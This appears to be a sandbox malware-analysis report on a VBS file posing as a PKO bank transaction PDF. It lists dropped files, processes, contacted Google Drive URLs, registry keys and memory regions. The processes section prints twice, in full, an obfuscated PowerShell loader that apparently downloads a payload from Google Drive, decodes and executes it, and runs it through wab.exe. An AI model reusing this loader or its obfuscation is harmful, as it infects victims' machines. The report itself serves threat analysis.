Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
pko_trans_details_20240909_105339#U00b7pdf.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jk3voiqc.xmh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mdwt1c4t.ovm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcw3c0ru.vjx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rj0vrkm1.bqf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Depraves.Ter
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\pko_trans_details_20240909_105339#U00b7pdf.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome)
{$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function
Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'(
$Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets
'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu
MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs
purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0
B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets
'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests
Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru
UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd=
iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty
YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets
'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia
BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin
Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy:
In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug.
Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$
Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery
St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera
oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde
SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa bestg Neo.emostsrSudat]Bilic:Gapat:SamviSFrouneStikkcBorgeuTegnirHar,miPrincts.jedyCystePKr
ftr MoneoSe.ietSp jtoBruttc pando BoatlAnyho L sse=Nonco .hein[LitioNAdulaeVe let no.c.Und rSPej se.useuc F ruu.ersir lgtsiDepentKrydsyEgaliPunlyrrC.mpio
GesttAntinoDi,sec.evevoExosmlAdr,sT Forsy VindpHaandeScolo]heter:No,sy:TheokTOveral,elvasp,rie1 Afkl2,onno ');$Raasylte=$clockwise[0];$Tetrodont=
(Hammondorglets 'Sulte$un.vigSeldsl RuskoParapbSporeaKorrul D,ma:Tj rijPolonaPe tagfus,ttUn nurproloe Arkege,viplRos,ae ReinmSgs,aeGen,en.inittKreateUltrarGenersjabbe=ml,esNNondeeknaldwAgata-
Syn,O WeigbSe skj yoyoe Apokc DybhtSighe I dtgSProteyCarpasTroldtMorteeUn afmClytu.C,hadN Brode ErhvtPhoto. ,pseWAfladeRe
ecb Tha.C.irculMiljti Sv,geBakshnSemipt');$Tetrodont+=$subtropiskes[1];Markedsadgang ($Tetrodont);Markedsadgang (Hammondorglets
',umme$Go aljTikanaSol,igCinemt.ismarRum,oeByretghem,tlSubsteTeen.m FigueKejsenRadertOpganeSolu.rMyelasLa,nl.UnionHAfkr.e
ontoaSerridDishaeUbenyrKommesPothe[Infor$k igsUinsannNon.ec.italoAuralvOl.ebeIndskrT.takeExterdBeeislEkstry Teg ]telel=Spgel$ParfoFPr.teoC.tetoPump,tHumbls
L.cul BekeoGennegTaenkgBaobaiEdifin So agTas,a ');$Sidedeling=Hammondorglets 'Sho.p$ KatejUnderaWarplgP.teotStalwr Menie antrg.ublelPsyche
Ae imforlgeStilen VrtstDus yechat rGema,s U.sp.,lemeDDilu oPhaenwpartunC,epilHuddlo Overa.adeadForhaF.rowsi amfulRenteeUforp(Un
st$StepdRbifalaMassoaAmin.sSorboyCa inlFors.tNum,eeHawbu,P,ast$ TerzNBordfoToddirNonphmPseudaGarden,ecrid FainyScapu)Astig
';$Normandy=$subtropiskes[0];Markedsadgang (Hammondorglets 'Postm$RescugBarskl .alsoG.brkbCartiaFri tl uhfj:AktivDUd lidSkolesFi
keuDetailInforyFuldbkSchemk ositeMl,esrSalamskanon=.nvot(Joy.oTAconie .ratsFore.tMunyc-TumfiPAfvasaCivilt capohStorh figen$DdsatN
CavaoLang rUncofmAbessaBladnnRepredCabobyFaksi)Lyses ');while (!$Ddsulykkers) {Markedsadgang (Hammondorglets 'S,kka$Millig
KanalWungeoPaasybLy,laaIndprlMicr,:PhiloFbe,ygl TyphaDemokmSikkeb Frite RenoaBanjouTilsvxPlast1overm8 Flo,9Bagfl=,oryp$FacittRe
sirEr.onuHjde e Mali ') ;Markedsadgang $Sidedeling;Markedsadgang (Hammondorglets 'Sma pSC,armt GennaTilgrrLeucotPtyka-Brn
sSTitall Al ieKometeHvernp Nitr Nonio4Leame ');Markedsadgang (Hammondorglets ' eute$Ind.igNske,lN.naso VenebRoberaBrinilT.lde:T
ollD TegndsupersKortsuAuckal Beh.yHaandkH.andk Pr,seProgrrAdvarsEfter=E.ige(RubbeTFranteUtenssValgktprimt-EntroPSa mea Overt,ndishRaphi
Afhng$I,gleNManaco Taksr rstmSubtraOrtopn BresdLawleyMinef) Alta ') ;Markedsadgang (Hammondorglets ' m.rs$ CollgH.ghclGeneroS.bsibLangtaWiniflFor.s:Re
isNSu,cooFarbrmRinghaWoofedpa.ise,hutais,dkonHymenvUmmvaa NippsMonasiChattoSkrosnApyroeVaduznStilms Van,2Balan= Mok.$ RalfgStudilAfspioLazulb
Indva Lektl Over:KrokeDdemi.eRotatpEndo eCatamrEnformstriksK age+Tilfl+Gaspr% Fre $OutracSektilWr.tho Qua cMoseokMorgewUnpreiEndotsOttine
Ngte.Afkric edio Datau Indkn OvertDispl ') ;$Raasylte=$clockwise[$Nomadeinvasionens2];}$Strikketj=327597;$Firmabilerne54=27440;Markedsadgang
(Hammondorglets 'Deal $IntergTrucklSadneoMashob VillaPolisl Cole:moolvT DiserK nspaSic.bnStv.esC ifta.iddllTelerp F.rriKlummn,oncueManutrPresb
Siste=Bro.z Stry.GSadomeIstant.ursu-OvervCTrvejoOvertncrypttN.mpheLyco nVejkrtR.sst Semi$RedniNSvejfo nofrDrvtym O daa uselnBiki.dSmedey
Baxy ');Markedsadgang (Hammondorglets 'Knowe$BlomkgForstlQuineo Mo obLe,ioaBookilHalvk: S inIPalfrn C.fedOgdenu AcepsSmilet
Tr nrMidteiFejema Min lFlad,iAtions,arveeDanefrMutcheFamilsStruc Fa.ta=N nap Unhum[ PredSHemsfy TaabsImpert.istre hovmm Brow.AntisC
Un eoGaullnfre avT romera.sirHjer tStark].offi:Baand: BeboFvaginr DepeoFleshmPolitBSprayaInde.sKortbeSlim.6 .elv4GingmS P.nctPe,agrPhreniFlertnPr
digA lah(Posts$,ejseTOvererKnnetaW tern AmstsCowicabrkdelBlok pFortri Stryn tokseInquir Kurd),rais ');Markedsadgang (Hammondorglets
' S mm$margag oelolVelseoRecitbUnconaBokselSkr,p:BarbeHBysa.j Geisn AkwaiEmaljvV,noueCh ysaKli,tuFngsls SkirpKlinkrTilkoomanufgUnbeaeUsyren
Ta.re Ernr Sch o=S.rud Indd [ReploSTrlleyPrimesMeteotAlveoeemittmLark,.PennaTbrisaelegemx ,nddtStipu. Mis.EK audnSeawacDigreo
yndidBaregiHelfln Kyl.gMisas]Subur:Virks: .innAMusicSDalsfCInsemIBindsIDisc..HyperGSmykkeOverrt Pr,eSS.otdtu,nderSunbuiPr
panGe.ergLahnd(Re,is$AskleI B.denMuddedT reruCountsUdflyt bil,rFrdigi Ta,baAlminlTel.fiMeg tsBookneSeamar,aalseFllessForsk)Gwynb
');Markedsadgang (Hammondorglets 'Resu $TerrogKolbtlKerneoOversb Non aSip ulVioli:AntikSLas.suSpec lE dikf Tra.iTov.rtEnsomtEnhedeM,rritMeta.=Kr,nr$
NeutHTikkejCalcunDiscuiScreavUnguaeMilitaLandsuafstnsAwakipafbryrKadeto ChoogEskameLertjnIlte ebevge.Dekods Dysmu UnivbBlacksSangstsneglr
SteriUng.inudpingR.izo( Maoi$Pros SAmbu,tOv,rcrHumm.i nkubk StabkEar he TakttstraujMa.ch,Renmo$ApophFdetaliTndstr s bcm.iskuaReif,bFitchiGen,nl
Pedue racr,orfrnNyttiePrinc5Tunes4 ,ond)cyber ');Markedsadgang $Sulfittet;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome)
{$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function
Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'(
$Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets
'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu
MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs
purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0
B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets
'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests
Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru
UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd=
iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty
YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets
'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia
BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin
Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy:
In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug.
Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$
Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery
St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera
oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde
SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa bestg Neo.emostsrSudat]Bilic:Gapat:SamviSFrouneStikkcBorgeuTegnirHar,miPrincts.jedyCystePKr
ftr MoneoSe.ietSp jtoBruttc pando BoatlAnyho L sse=Nonco .hein[LitioNAdulaeVe let no.c.Und rSPej se.useuc F ruu.ersir lgtsiDepentKrydsyEgaliPunlyrrC.mpio
GesttAntinoDi,sec.evevoExosmlAdr,sT Forsy VindpHaandeScolo]heter:No,sy:TheokTOveral,elvasp,rie1 Afkl2,onno ');$Raasylte=$clockwise[0];$Tetrodont=
(Hammondorglets 'Sulte$un.vigSeldsl RuskoParapbSporeaKorrul D,ma:Tj rijPolonaPe tagfus,ttUn nurproloe Arkege,viplRos,ae ReinmSgs,aeGen,en.inittKreateUltrarGenersjabbe=ml,esNNondeeknaldwAgata-
Syn,O WeigbSe skj yoyoe Apokc DybhtSighe I dtgSProteyCarpasTroldtMorteeUn afmClytu.C,hadN Brode ErhvtPhoto. ,pseWAfladeRe
ecb Tha.C.irculMiljti Sv,geBakshnSemipt');$Tetrodont+=$subtropiskes[1];Markedsadgang ($Tetrodont);Markedsadgang (Hammondorglets
',umme$Go aljTikanaSol,igCinemt.ismarRum,oeByretghem,tlSubsteTeen.m FigueKejsenRadertOpganeSolu.rMyelasLa,nl.UnionHAfkr.e
ontoaSerridDishaeUbenyrKommesPothe[Infor$k igsUinsannNon.ec.italoAuralvOl.ebeIndskrT.takeExterdBeeislEkstry Teg ]telel=Spgel$ParfoFPr.teoC.tetoPump,tHumbls
L.cul BekeoGennegTaenkgBaobaiEdifin So agTas,a ');$Sidedeling=Hammondorglets 'Sho.p$ KatejUnderaWarplgP.teotStalwr Menie antrg.ublelPsyche
Ae imforlgeStilen VrtstDus yechat rGema,s U.sp.,lemeDDilu oPhaenwpartunC,epilHuddlo Overa.adeadForhaF.rowsi amfulRenteeUforp(Un
st$StepdRbifalaMassoaAmin.sSorboyCa inlFors.tNum,eeHawbu,P,ast$ TerzNBordfoToddirNonphmPseudaGarden,ecrid FainyScapu)Astig
';$Normandy=$subtropiskes[0];Markedsadgang (Hammondorglets 'Postm$RescugBarskl .alsoG.brkbCartiaFri tl uhfj:AktivDUd lidSkolesFi
keuDetailInforyFuldbkSchemk ositeMl,esrSalamskanon=.nvot(Joy.oTAconie .ratsFore.tMunyc-TumfiPAfvasaCivilt capohStorh figen$DdsatN
CavaoLang rUncofmAbessaBladnnRepredCabobyFaksi)Lyses ');while (!$Ddsulykkers) {Markedsadgang (Hammondorglets 'S,kka$Millig
KanalWungeoPaasybLy,laaIndprlMicr,:PhiloFbe,ygl TyphaDemokmSikkeb Frite RenoaBanjouTilsvxPlast1overm8 Flo,9Bagfl=,oryp$FacittRe
sirEr.onuHjde e Mali ') ;Markedsadgang $Sidedeling;Markedsadgang (Hammondorglets 'Sma pSC,armt GennaTilgrrLeucotPtyka-Brn
sSTitall Al ieKometeHvernp Nitr Nonio4Leame ');Markedsadgang (Hammondorglets ' eute$Ind.igNske,lN.naso VenebRoberaBrinilT.lde:T
ollD TegndsupersKortsuAuckal Beh.yHaandkH.andk Pr,seProgrrAdvarsEfter=E.ige(RubbeTFranteUtenssValgktprimt-EntroPSa mea Overt,ndishRaphi
Afhng$I,gleNManaco Taksr rstmSubtraOrtopn BresdLawleyMinef) Alta ') ;Markedsadgang (Hammondorglets ' m.rs$ CollgH.ghclGeneroS.bsibLangtaWiniflFor.s:Re
isNSu,cooFarbrmRinghaWoofedpa.ise,hutais,dkonHymenvUmmvaa NippsMonasiChattoSkrosnApyroeVaduznStilms Van,2Balan= Mok.$ RalfgStudilAfspioLazulb
Indva Lektl Over:KrokeDdemi.eRotatpEndo eCatamrEnformstriksK age+Tilfl+Gaspr% Fre $OutracSektilWr.tho Qua cMoseokMorgewUnpreiEndotsOttine
Ngte.Afkric edio Datau Indkn OvertDispl ') ;$Raasylte=$clockwise[$Nomadeinvasionens2];}$Strikketj=327597;$Firmabilerne54=27440;Markedsadgang
(Hammondorglets 'Deal $IntergTrucklSadneoMashob VillaPolisl Cole:moolvT DiserK nspaSic.bnStv.esC ifta.iddllTelerp F.rriKlummn,oncueManutrPresb
Siste=Bro.z Stry.GSadomeIstant.ursu-OvervCTrvejoOvertncrypttN.mpheLyco nVejkrtR.sst Semi$RedniNSvejfo nofrDrvtym O daa uselnBiki.dSmedey
Baxy ');Markedsadgang (Hammondorglets 'Knowe$BlomkgForstlQuineo Mo obLe,ioaBookilHalvk: S inIPalfrn C.fedOgdenu AcepsSmilet
Tr nrMidteiFejema Min lFlad,iAtions,arveeDanefrMutcheFamilsStruc Fa.ta=N nap Unhum[ PredSHemsfy TaabsImpert.istre hovmm Brow.AntisC
Un eoGaullnfre avT romera.sirHjer tStark].offi:Baand: BeboFvaginr DepeoFleshmPolitBSprayaInde.sKortbeSlim.6 .elv4GingmS P.nctPe,agrPhreniFlertnPr
digA lah(Posts$,ejseTOvererKnnetaW tern AmstsCowicabrkdelBlok pFortri Stryn tokseInquir Kurd),rais ');Markedsadgang (Hammondorglets
' S mm$margag oelolVelseoRecitbUnconaBokselSkr,p:BarbeHBysa.j Geisn AkwaiEmaljvV,noueCh ysaKli,tuFngsls SkirpKlinkrTilkoomanufgUnbeaeUsyren
Ta.re Ernr Sch o=S.rud Indd [ReploSTrlleyPrimesMeteotAlveoeemittmLark,.PennaTbrisaelegemx ,nddtStipu. Mis.EK audnSeawacDigreo
yndidBaregiHelfln Kyl.gMisas]Subur:Virks: .innAMusicSDalsfCInsemIBindsIDisc..HyperGSmykkeOverrt Pr,eSS.otdtu,nderSunbuiPr
panGe.ergLahnd(Re,is$AskleI B.denMuddedT reruCountsUdflyt bil,rFrdigi Ta,baAlminlTel.fiMeg tsBookneSeamar,aalseFllessForsk)Gwynb
');Markedsadgang (Hammondorglets 'Resu $TerrogKolbtlKerneoOversb Non aSip ulVioli:AntikSLas.suSpec lE dikf Tra.iTov.rtEnsomtEnhedeM,rritMeta.=Kr,nr$
NeutHTikkejCalcunDiscuiScreavUnguaeMilitaLandsuafstnsAwakipafbryrKadeto ChoogEskameLertjnIlte ebevge.Dekods Dysmu UnivbBlacksSangstsneglr
SteriUng.inudpingR.izo( Maoi$Pros SAmbu,tOv,rcrHumm.i nkubk StabkEar he TakttstraujMa.ch,Renmo$ApophFdetaliTndstr s bcm.iskuaReif,bFitchiGen,nl
Pedue racr,orfrnNyttiePrinc5Tunes4 ,ond)cyber ');Markedsadgang $Sulfittet;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t"
|
||
|
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://drive.googPR
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://drive.usercontent.google.com/c
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 14 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
||
|
drive.google.com
|
142.250.185.238
|
||
|
drive.usercontent.google.com
|
142.250.181.225
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.181.225
|
drive.usercontent.google.com
|
United States
|
||
|
142.250.185.238
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
There are 9 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1BCD84EF000
|
trusted library allocation
|
page read and write
|
|
|
|
5946000
|
trusted library allocation
|
page read and write
|
|
|
|
6F35000
|
heap
|
page read and write
|
|
|
|
9630000
|
direct allocation
|
page execute and read and write
|
|
|
|
C6E5000
|
direct allocation
|
page execute and read and write
|
|
|
|
95F0000
|
trusted library allocation
|
page read and write
|
||
|
4665000
|
heap
|
page execute and read and write
|
||
|
AC03EB7000
|
stack
|
page read and write
|
||
|
B80000
|
trusted library section
|
page read and write
|
||
|
7FB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBCA000
|
trusted library allocation
|
page read and write
|
||
|
2A084CE4000
|
heap
|
page read and write
|
||
|
9EE5000
|
direct allocation
|
page execute and read and write
|
||
|
7340000
|
trusted library allocation
|
page read and write
|
||
|
2D30000
|
heap
|
page read and write
|
||
|
95E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4670000
|
heap
|
page read and write
|
||
|
1BCE0970000
|
heap
|
page read and write
|
||
|
9135000
|
trusted library allocation
|
page read and write
|
||
|
AC03A7E000
|
stack
|
page read and write
|
||
|
8280000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACACC000
|
trusted library allocation
|
page execute and read and write
|
||
|
592F000
|
trusted library allocation
|
page read and write
|
||
|
6FEE000
|
stack
|
page read and write
|
||
|
737B000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC40000
|
trusted library allocation
|
page read and write
|
||
|
2A084715000
|
heap
|
